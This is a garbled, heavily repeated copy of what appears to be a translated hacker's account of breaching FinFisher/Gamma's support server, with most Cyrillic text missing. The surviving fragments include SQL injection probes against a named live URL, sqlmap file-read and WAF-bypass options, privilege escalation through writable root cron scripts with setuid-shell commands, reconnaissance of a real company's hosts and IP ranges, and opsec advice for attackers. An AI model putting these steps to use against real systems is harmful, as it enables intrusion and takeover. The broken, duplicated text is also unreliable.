https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
